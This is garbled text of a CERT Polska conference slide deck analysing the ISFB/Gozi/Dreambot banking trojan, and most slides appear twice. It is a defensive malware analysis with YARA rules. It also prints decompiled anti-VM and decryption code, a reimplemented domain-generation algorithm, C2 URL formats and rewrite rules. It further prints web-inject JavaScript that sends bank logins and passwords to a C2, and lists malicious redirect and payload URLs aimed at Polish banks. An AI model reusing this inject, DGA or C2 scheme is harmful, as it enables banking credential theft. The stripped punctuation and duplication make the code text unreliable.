DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 558
ISFB long story short
Based on gozisame bugs going back to 2007UrsnifGoziGozi2RovnixVawtrakCasual history with rovnixFor us public appearence in 2014Now one of most puplar bankers on marketCouple of offsprings
middotmiddotmiddotmiddotmiddotmiddotmiddot
558
02122016 ISFB
httpslokalhostpltalksbotconf20161 658
ISFB
UrsnifGoziGozi2RovnixVawtrak
DbgPrint(ISFB_04x Installer DLL finished with status un GetCurrentProcessId() Status)C
ISFB project Version 213241 module dllc $Revision 265 $
658
02122016 ISFB
httpslokalhostpltalksbotconf20161 758
Scale
(n6 sinkhole connections in october - bankers only)
758
02122016 ISFB
httpslokalhostpltalksbotconf20161 858
Scale gt dbconfigdistinct(keytypeisfbexe_typeworker) [ q1a2z3w4s5x6e7d8 S951DX7IZXHH4Y6P OvZz8XVH91INT7ek V86iYRDA2FSEqWzL 87694321POIRYTRI 77694321POIRYTRI DB23B3470D0CF889 A79CE7E04B4C9A6A byVMLEDZAlowtPY 0123456789ABCDEF 2345D892B97F02A Drbp2YVKMWkmPGtJ Dfei8OoQ0xhjTyql 0WADGyh7SUCs1i2V PHZ4OVL2QLI0N8WN ]
858
02122016 ISFB
httpslokalhostpltalksbotconf20161 958
Scale
958
Scale
02122016 ISFB
httpslokalhostpltalksbotconf20161 1058
Scalekudos to Slavo (SWITCH-CERT)
1058
02122016 ISFB
httpslokalhostpltalksbotconf20161 1158
The Dropperor where the acients reside
02122016 ISFB
httpslokalhostpltalksbotconf20161 1258
Welcome to the system
achieve persistencyinject workersetup IPCnew download 2nd stage
middotmiddotmiddotmiddot
1258
02122016 ISFB
httpslokalhostpltalksbotconf20161 1358
Useless strings
1358
02122016 ISFB
httpslokalhostpltalksbotconf20161 1458
One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)
1458
02122016 ISFB
httpslokalhostpltalksbotconf20161 1558
Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)
C
1558
Anti-VM
02122016 ISFB
httpslokalhostpltalksbotconf20161 1658
Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)
C
1658
02122016 ISFB
httpslokalhostpltalksbotconf20161 1758
String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12
C
1758
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 658
ISFB
UrsnifGoziGozi2RovnixVawtrak
DbgPrint(ISFB_04x Installer DLL finished with status un GetCurrentProcessId() Status)C
ISFB project Version 213241 module dllc $Revision 265 $
658
02122016 ISFB
httpslokalhostpltalksbotconf20161 758
Scale
(n6 sinkhole connections in october - bankers only)
758
02122016 ISFB
httpslokalhostpltalksbotconf20161 858
Scale gt dbconfigdistinct(keytypeisfbexe_typeworker) [ q1a2z3w4s5x6e7d8 S951DX7IZXHH4Y6P OvZz8XVH91INT7ek V86iYRDA2FSEqWzL 87694321POIRYTRI 77694321POIRYTRI DB23B3470D0CF889 A79CE7E04B4C9A6A byVMLEDZAlowtPY 0123456789ABCDEF 2345D892B97F02A Drbp2YVKMWkmPGtJ Dfei8OoQ0xhjTyql 0WADGyh7SUCs1i2V PHZ4OVL2QLI0N8WN ]
858
02122016 ISFB
httpslokalhostpltalksbotconf20161 958
Scale
958
Scale
02122016 ISFB
httpslokalhostpltalksbotconf20161 1058
Scalekudos to Slavo (SWITCH-CERT)
1058
02122016 ISFB
httpslokalhostpltalksbotconf20161 1158
The Dropperor where the acients reside
02122016 ISFB
httpslokalhostpltalksbotconf20161 1258
Welcome to the system
achieve persistencyinject workersetup IPCnew download 2nd stage
middotmiddotmiddotmiddot
1258
02122016 ISFB
httpslokalhostpltalksbotconf20161 1358
Useless strings
1358
02122016 ISFB
httpslokalhostpltalksbotconf20161 1458
One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)
1458
02122016 ISFB
httpslokalhostpltalksbotconf20161 1558
Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)
C
1558
Anti-VM
02122016 ISFB
httpslokalhostpltalksbotconf20161 1658
Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)
C
1658
02122016 ISFB
httpslokalhostpltalksbotconf20161 1758
String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12
C
1758
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
